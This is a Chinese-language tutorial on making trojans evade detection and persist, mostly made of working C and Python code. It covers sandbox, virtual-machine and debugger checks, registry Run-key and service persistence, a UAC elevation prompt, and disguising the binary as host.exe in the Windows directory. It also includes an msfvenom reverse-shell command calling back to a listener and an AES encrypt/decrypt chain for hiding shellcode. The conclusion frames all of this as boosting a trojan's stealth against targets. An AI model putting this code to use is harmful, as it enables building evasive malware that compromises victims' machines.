木马反制与隐藏技巧详解

反沙箱技术

沙箱检测原理

沙箱(Sandbox)是一种隔离机制，通过创建受控的隔离环境来安全分析恶意软件。国内常用云沙箱平台：

• 微步在线：https://s.threatbook.com/
• 安恒云沙箱：https://sandbox.dbappsecurity.com.cn/

白名单检测实现

通过检测常用软件进程是否存在来判断是否运行在沙箱环境：

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdbool.h>

bool is_process_running(const char* process_name) {
    bool found = false;
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;
    
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        return false;
    }
    
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hProcessSnap, &pe32)) {
        CloseHandle(hProcessSnap);
        return false;
    }
    
    do {
        if (strcmp(pe32.szExeFile, process_name) == 0) {
            found = true;
            break;
        }
    } while (Process32Next(hProcessSnap, &pe32));
    
    CloseHandle(hProcessSnap);
    return found;
}

int main() {
    if (!is_process_running("qq.exe") && !is_process_running("wechat.exe")) {
        return 0; // 沙箱环境，退出程序
    }
    return 0;
}

反虚拟机技术

虚拟机检测方法

通过检查注册表中的硬件信息判断是否运行在虚拟机中：

#include <windows.h>
#include <stdio.h>

int IsRunningInVM() {
    char szHardware[256];
    DWORD size = sizeof(szHardware);
    int isVM = 0;
    
    // 检查IDE硬件信息
    if (RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Enum\\IDE", 
                    "HardwareID", RRF_RT_REG_SZ, NULL, szHardware, &size) == ERROR_SUCCESS) {
        if (strstr(szHardware, "VMware") || strstr(szHardware, "Virtual")) {
            isVM = 1;
        }
    }
    
    size = sizeof(szHardware);
    // 检查磁盘枚举信息
    if (RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum", 
                    "0", RRF_RT_REG_SZ, NULL, szHardware, &size) == ERROR_SUCCESS) {
        if (strstr(szHardware, "VMware") || strstr(szHardware, "VBOX")) {
            isVM = 1;
        }
    }
    
    return isVM;
}

int main(int argc, char *argv[]) {
    if (IsRunningInVM()) {
        return 0; // 虚拟机环境，退出程序
    }
    // 正常执行代码
}

反调试技术

调试器检测

使用IsDebuggerPresent函数检测调试器：

#include <windows.h>
#include <stdio.h>

void checkDebugger() {
    if (IsDebuggerPresent()) {
        ExitProcess(1); // 检测到调试器，立即退出
    }
}

int main() {
    checkDebugger();
    return 0;
}

持久化技术

注册表自启动

通过修改注册表实现开机自启动：

#include <windows.h>
#include <stdio.h>

void add_to_startup(const char *appname, const char *path) {
    HKEY hKey;
    LONG result;
    
    result = RegOpenKeyEx(HKEY_CURRENT_USER, 
                        "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 
                        0, KEY_SET_VALUE, &hKey);
    if (result != ERROR_SUCCESS) {
        return;
    }
    
    result = RegSetValueEx(hKey, appname, 0, REG_SZ, (BYTE *)path, strlen(path) + 1);
    RegCloseKey(hKey);
}

int main(int argc, char *argv[]) {
    char path[MAX_PATH];
    if (GetModuleFileName(NULL, path, MAX_PATH) == 0) {
        return 1;
    }
    add_to_startup("MyAppName", path);
}

服务注册自启动

通过创建Windows服务实现持久化：

#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

void CreateServiceToRunAtStartup() {
    SC_HANDLE schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
    if (schSCManager == NULL) {
        return;
    }
    
    char path[MAX_PATH];
    SHGetSpecialFolderPath(NULL, path, CSIDL_WINDOWS, FALSE);
    strcat(path, "\\host.exe");
    
    SC_HANDLE schService = CreateService(
        schSCManager,
        "host",           // 服务名
        "host",           // 显示名称
        SERVICE_ALL_ACCESS,
        SERVICE_WIN32_OWN_PROCESS,
        SERVICE_AUTO_START,  // 开机自启动
        SERVICE_ERROR_NORMAL,
        path,            // 可执行文件路径
        NULL, NULL, NULL, NULL, NULL);
    
    if (schService == NULL) {
        CloseServiceHandle(schSCManager);
        return;
    }
    
    CloseServiceHandle(schService);
    CloseServiceHandle(schSCManager);
}

int main(int argc, char *argv[]) {
    CreateServiceToRunAtStartup();
}

提权技术

管理员权限申请

通过UAC弹窗申请管理员权限：

#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

BOOL IsRunAsAdministrator() {
    BOOL fIsRunAsAdmin = FALSE;
    PSID pAdministratorsGroup = NULL;
    
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, 
                               DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, 
                               &pAdministratorsGroup)) {
        CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin);
        FreeSid(pAdministratorsGroup);
    }
    
    return fIsRunAsAdmin;
}

void ElevatePrivileges() {
    if (!IsRunAsAdministrator()) {
        char szPath[MAX_PATH];
        if (GetModuleFileName(NULL, szPath, ARRAYSIZE(szPath))) {
            SHELLEXECUTEINFO sei = { sizeof(sei) };
            sei.lpVerb = "runas";
            sei.lpFile = szPath;
            sei.hwnd = NULL;
            sei.nShow = SW_NORMAL;
            
            if (!ShellExecuteEx(&sei)) {
                exit(1);
            }
            exit(0);
        }
    }
}

int main(int argc, char *argv[]) {
    ElevatePrivileges();
}

文件隐藏技术

文件转移隐藏

将木马文件复制到系统目录并重命名：

#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

void CopyFilesToWindowsDir() {
    char srcPath[MAX_PATH], destPath[MAX_PATH];
    GetModuleFileName(NULL, srcPath, MAX_PATH);
    SHGetSpecialFolderPath(NULL, destPath, CSIDL_WINDOWS, FALSE);
    strcat(destPath, "\\host.exe");
    CopyFile(srcPath, destPath, FALSE);
}

int main(int argc, char *argv[]) {
    CopyFilesToWindowsDir();
}

Shellcode混淆技术

AES加密Shellcode

1. 生成原始Shellcode：

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.0.110 lport=8888 -f raw -o msf.bin

2. 使用Python进行AES加密：

import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from os import urandom
import hashlib

def AESencrypt(plaintext, key):
    k = hashlib.sha256(key).digest()
    iv = 16 * b'\x00'
    plaintext = pad(plaintext, AES.block_size)
    cipher = AES.new(k, AES.MODE_CBC, iv)
    ciphertext = cipher.encrypt(plaintext)
    return ciphertext, key

def printResult(key, ciphertext):
    print('char AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in key) + ' };')
    print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

try:
    file = open(sys.argv[1], "rb")
    content = file.read()
except:
    print("Usage: .\AES_cryptor.py PAYLOAD_FILE")
    sys.exit()

KEY = urandom(16)
ciphertext, key = AESencrypt(content, KEY)
printResult(KEY, ciphertext)

3. C语言解密实现：

#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <wincrypt.h>
#pragma comment(lib, "crypt32.lib")
#pragma comment(lib, "advapi32.lib")

void aes(char* code, DWORD codeLen, char* key, DWORD keyLen) {
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    HCRYPTKEY hKey;
    
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return;
    }
    
    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
        return;
    }
    
    if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
        return;
    }
    
    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
        return;
    }
    
    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)code, &codeLen)) {
        return;
    }
    
    CryptReleaseContext(hProv, 0);
    CryptDestroyHash(hHash);
    CryptDestroyKey(hKey);
}

int main(int argc, char *argv[]) {
    unsigned char key[] = { 0xed, 0x39, 0x56, 0x67, 0xcd, 0x62, 0xf7, 0x91, 
                          0x62, 0xb, 0x85, 0x53, 0x9b, 0x17, 0xae, 0xc9 };
    
    unsigned char code[] = {0xa0, 0x82, 0xa3, 0xbf, 0xce, 0xd5, 0xd5, 0xce, /* ... */ };
    
    DWORD code_length = sizeof(code);
    aes((char*)code, code_length, key, sizeof(key));
    
    // 解密后的shellcode可以执行
}

总结

本文详细介绍了木马程序的反沙箱、反虚拟机、反调试技术，以及持久化、提权、文件隐藏和Shellcode混淆等高级技巧。这些技术可以组合使用，提高木马程序的隐蔽性和生存能力。在实际应用中，应根据目标环境选择合适的组合方案。